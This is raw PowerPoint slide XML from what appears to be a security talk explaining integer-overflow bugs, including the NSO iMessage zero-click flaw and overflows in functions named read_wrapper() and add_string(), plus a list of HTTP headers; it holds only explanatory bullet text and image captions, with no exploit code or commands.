              <a:rPr lang="en-US" dirty="0"/>
              <a:t>within a PDF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Graphical user interface, text, application&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83E407C9-849C-E7D8-22E4-F4253510D212}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="349620" y="2025887"/>
            <a:ext cx="7912100" cy="2616200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4229958-E80D-550D-3FDD-7E8E434E73A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1344063" y="3596529"/>
            <a:ext cx="90198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5015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2094-2CE1-D9D2-4C2F-805FE1E607E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NSO iMessage Vulnerability – 2 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2" descr="Adding all segments in a PDF together - https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0076E60-A513-B424-F73A-1293263E612B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1236541"/>
            <a:ext cx="6473486" cy="885214"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allocate a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> based upon this – too small!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Overflowed size used in allocation: https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48E51477-BFFE-31E4-78F3-65E1204D87D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="1698964"/>
            <a:ext cx="8001000" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Buffer overflow occurs: https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A592471-A074-CE03-25C1-89D3A93EEC84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2374900" y="2895600"/>
            <a:ext cx="6769100" cy="2247900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 2" descr="Adding all segments in a PDF together - https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{631793FB-63B5-1A31-6D29-782AFB658C58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="2247900"/>
            <a:ext cx="7886700" cy="462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Write to this buffer with user controlled data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Connector 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BE415DE-0DFB-B1E4-4A26-B7E9001373F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="2025181"/>
            <a:ext cx="90198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8291FEB-6B0B-DF9E-0162-F90F5F85566D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480874" y="2025181"/>
            <a:ext cx="90198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C31F68-799D-3EA4-8CF7-3055281C0186}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3420862" y="4814249"/>
            <a:ext cx="123991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4690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D983-E43B-DDF1-45CE-4E9420A78682}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integer Overflow in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>read_wrapper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95CECDB1-050A-A5A3-11A4-B0C73AE342A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No validation of overflow – common mistake to make</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Trying to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0"/>
              <a:t>double</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> the size of the allocation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="If size isn't big enough double it code in 'read_wrapper'">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F567B54B-A24F-77C7-260B-CDA929BF7C86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="721864" y="2404545"/>
            <a:ext cx="7300329" cy="2194088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8272B99-369C-08A7-BDD0-5C184CC2BA72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2167631" y="2762028"/>
            <a:ext cx="90198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2225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8A34E-7787-26ED-0B31-D86F317D4AB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integer Overflow in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>add_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{035008F7-80A7-C159-1057-88707D07ADDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>add_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() – used for adding the response data together</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automatically resizes the buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Integer overflow in the resizing function">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE536E7F-D427-18F9-964F-8B568D1D878D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="489196" y="1999264"/>
            <a:ext cx="7810500" cy="2565400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Connector 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{536ED52B-AEED-1E45-D2B8-5B8853D337B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3295095" y="2664373"/>
            <a:ext cx="481021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9572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8A34E-7787-26ED-0B31-D86F317D4AB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integer Overflow in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>add_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{035008F7-80A7-C159-1057-88707D07ADDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1236541"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>add_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() – used for adding the response data together</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automatically resizes the buffer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Function signature for 'add_string()'">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D11CABC-E17E-95A7-ACBF-6E2E6D14AE3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2118996"/>
            <a:ext cx="9144000" cy="510024"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Connector 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{536ED52B-AEED-1E45-D2B8-5B8853D337B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="5" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6258757" y="2374008"/>
            <a:ext cx="2885243" cy="10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67A586A0-6185-E671-1B0A-24C93057AC61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="408188" y="2785217"/>
            <a:ext cx="7886700" cy="994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unsigned short: 2^16</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11" descr="Integer overflow in the resizing function">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{440142A7-3844-FA30-08EE-4A7E6D8D7481}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect t="13995" b="60273"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="446288" y="3256940"/>
            <a:ext cx="7810500" cy="660126"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Connector 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97D003AB-59A4-0231-7D46-88F2FF36DDB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="12" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3277339" y="3587003"/>
            <a:ext cx="497944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983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21C8-10E9-E840-14A1-29C862AA45AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How Is This Even Exploitable?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05AEA77A-2462-D594-D5E0-631257EA89F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1236541"/>
            <a:ext cx="7886700" cy="1597982"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Large initial string for overflow? Nope.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>Small</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> buffer + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>huge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> string = crash</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 15" descr="Small buffer being copied into a LARGE BUFFER">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{442DAE13-1E0D-1D45-D404-0C1AED152756}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-245739" y="2137452"/>
            <a:ext cx="3779052" cy="2920177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20" descr="Chart, histogram&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EA4EA7D-8721-2BB1-6B34-243A87717ED7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="2035532"/>
            <a:ext cx="4456651" cy="3038626"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Straight Connector 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FD46A86-1738-948E-126C-FD3CF9164017}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5228948" y="2698812"/>
            <a:ext cx="3169328" cy="15358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B14157-0070-A73B-8EF3-6503937A9150}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5215661" y="2698812"/>
            <a:ext cx="3031694" cy="15358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567DA530-69EF-4065-A1DF-E08490E10A62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6446853" y="2698812"/>
            <a:ext cx="1029810" cy="72287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275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4C90-DDEC-754E-A2D9-3EE80F9C49FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>List of Supported Headers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{894852FC-4C57-3D4D-A1D8-DB47AC393E64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>X-Override-Path: Dynamically change the PATH of the request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>X-Override-Host: Dynamically change the HOST of the request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Connection: Keep the connection open and drop headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Content-Length: Length of the body of the request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Content-Type: The TYPE of the request of the body. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authorization: Authenticating as a user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User-Agent: The user information for the request (Chrome, Firefox, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Host: The hostname of the request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Origin: The origin of the request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>X-Request-Id: The request ID used for the response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Custom handling - callback functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1566799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21C8-10E9-E840-14A1-29C862AA45AB}"/>
              </a:ext>
            </a:extLst>
